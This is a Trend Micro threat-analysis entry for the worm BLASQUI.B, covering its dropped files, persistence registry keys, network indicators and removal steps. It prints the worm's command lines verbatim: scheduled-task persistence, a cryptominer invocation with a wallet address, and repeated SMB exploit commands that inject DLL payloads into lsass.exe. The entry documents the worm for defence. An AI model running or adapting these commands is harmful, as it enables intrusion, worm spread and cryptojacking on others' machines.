Worm.Win32.BLASQUI.B

 Analysis by: Raymart Christian Yambot

 ALIASES:

Trojan.Win32.Wofith.agu (KASPERSKY)

 PLATFORM:

Windows

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Worm

  • Destructiveness: No

  • Encrypted:

  • In the wild: Yes

  OVERVIEW

Infection Channel:

Dropped by other malware, Downloaded from the Internet

This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

  TECHNICAL DETAILS

File Size:

9,402,368 bytes

File Type:

EXE

Memory Resident:

No

Initial Samples Received Date:

25 Aug 2023

Payload:

Connects to URLs/IPs, Drops files, Modifies system registry

Arrival Details

This Worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Worm drops the following files:

  • %All Users Profile%\spread.txt → copy of itself
  • %Windows%\bbfsvcc.exe → deleted afterwards
  • %All Users Profile%\SMB.exe → deleted afterwards
  • %All Users Profile%\X86.dll
  • %All Users Profile%\X64.dll
  • %All Users Profile%\{IP Address}.txt
  • \{IP Address}\ADMIN$\spread.txt

(Note: %All Users Profile% is the common user's profile folder, which is usually C:\Documents and Settings\All Users on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\ProgramData on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit). . %Windows% is the Windows folder, where it usually is C:\Windows on all Windows operating system versions.)

It adds the following processes:

  • md /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr {Malware File Path} /F
  • cmd /c taskkill /f /im bbfsvcc.exe&&exit
  • taskkill /f /im bbfsvcc.exe
  • cmd /c ipconfig /flushdns
  • cmd /c taskkill /f /im bbfsvcc.exe&&exit;
  • %Windows%\bbfsvcc.exe -o stratum+tcp://{BLOCKED}pool.org:19999 -a cn/r -u 42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc -p X --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
  • %All Users Profile%\SMB.exe
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostlong.exe --TargetIp {Target IP} --Target {Target OS Machine} --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig {Target IP}.txt&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • cmd /c cd %All Users Profile%\&&svchostlong.exe --TargetIp {Target IP} --Target {Target OS Machine} --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig {Target IP}.txt&&serverlong.exe --OutConfig {Target IP}-dll.txt --TargetIp {Target IP} --TargetPort 445 --DllPayload X86.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target {Target OS Machine} --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostlong.exe --TargetIp {Target IP} --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig {Target IP}.txt
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target VISTA_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostromance.exe --OutConfig {Target IP}.txt --TargetIp {Target IP} --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml
  • svchostlong.exe --TargetIp {Target IP} --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig {Target IP}.txt

Autostart Technique

This Worm adds the following registry entries to enable its automatic execution at every system startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run
QQMusic = {Malware File Path}

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
QQMusic = {Malware File Path}

Other System Modifications

This Worm adds the following registry entries:

HKEY_CURRENT_USER\Network\K
RemotePath = \{IP Address}\ADMIN$

HKEY_CURRENT_USER\Network\K
UserName =

HKEY_CURRENT_USER\Network\K
ProviderName = Microsoft Windows Network

HKEY_CURRENT_USER\Network\K
ProviderType = 131072

HKEY_CURRENT_USER\Network\K
ConnectionType = 0

KEY_CURRENT_USER\Network\K
DeferFlags = 4

Other Details

This Worm adds the following registry keys:

HKEY_CURRENT_USER\Network\K

It connects to the following possibly malicious URL:

  • {BLOCKED}.{BLOCKED}.{BLOCKED}.2
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.11
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.15
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.4
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.6
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.10
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.5
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.8
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.24
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.26
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.17
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.27
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.7
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.9
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.35
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.23
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.21
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.25
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.37
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.31
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.29
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.12
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.18
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.18
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.32
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.40
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.16
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.28
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.30
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.36
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.42
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.90
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.44
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.48
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.50
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.22
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.46
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.34
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.13
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.66
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.70
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.14
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.74
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.76
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.60
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.98
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.52
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.80
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.86
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.54
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.62
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.64
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.68
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.72
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.82
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.84
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.88
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.92
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.94
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.78
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.41
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.79
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.19
  • {BLOCKED}.{BLOCKED}.{BLOCKED}.20

  SOLUTION

Minimum Scan Engine:

9.800

FIRST VSAPI PATTERN FILE:

18.666.03

FIRST VSAPI PATTERN DATE:

30 Aug 2023

VSAPI OPR PATTERN File:

18.667.00

VSAPI OPR PATTERN Date:

31 Aug 2023

Step 1

Trend Micro Predictive Machine Learning detects and blocks malware at the first sign of its existence, before it executes on your system. When enabled, your Trend Micro product detects this malware under the following machine learning name:

    • Troj.Win32.TRX.XXPE50FFF071

Step 2

Before doing any scans, Windows 7, Windows 8, Windows 8.1, and Windows 10 users must disable System Restore to allow full scanning of their computers.

Step 3

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 4

Delete this registry key

[ Learn More ]

Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how or you can ask assistance from your system administrator. Else, check this Microsoft article first before modifying your computer's registry.

  • In HKEY_CURRENT_USER\Network\K

Step 5

Delete this registry value

[ Learn More ]

Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this step only if you know how or you can ask assistance from your system administrator. Else, check this Microsoft article first before modifying your computer's registry.

  • In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    • QQMusic = {Malware File Path}
  • In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    • QQMusic = {Malware File Path}
  • In HKEY_CURRENT_USER\Network\K
    • RemotePath = \\{IP Addres}\ADMIN$
  • In HKEY_CURRENT_USER\Network\K
    • UserName   
  • In HKEY_CURRENT_USER\Network\K
    • ProviderName = Microsoft Windows Network
  • In HKEY_CURRENT_USER\Network\K
    • ProviderType = 131072
  • In HKEY_CURRENT_USER\Network\K
    • ConnectionType = 0
  • In HKEY_CURRENT_USER\Network\K
    • DeferFlags = 4

Step 6

Search and delete this file

[ Learn More ]
There may be some files that are hidden. Please make sure you check the Search Hidden Files and Folders checkbox in the "More advanced options" option to include all hidden files and folders in the search result.
  • %All Users Profile%\spread.txt
  • %Windows%\bbfsvcc.exe
  • %Windows\bbfsvcc.exe
  • %All Users Profile%\SMB.exe
  • %All Users Profile%\X86.dll
  • %All Users Profile%\X64.dll
  • %All Users Profile%\{IP Address}.txt
  • \\{IP Address}\ADMIN$\spread.txt

Step 7

Scan your computer with your Trend Micro product to delete files detected as Worm.Win32.BLASQUI.B. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:


Did this description help? Tell us how we did.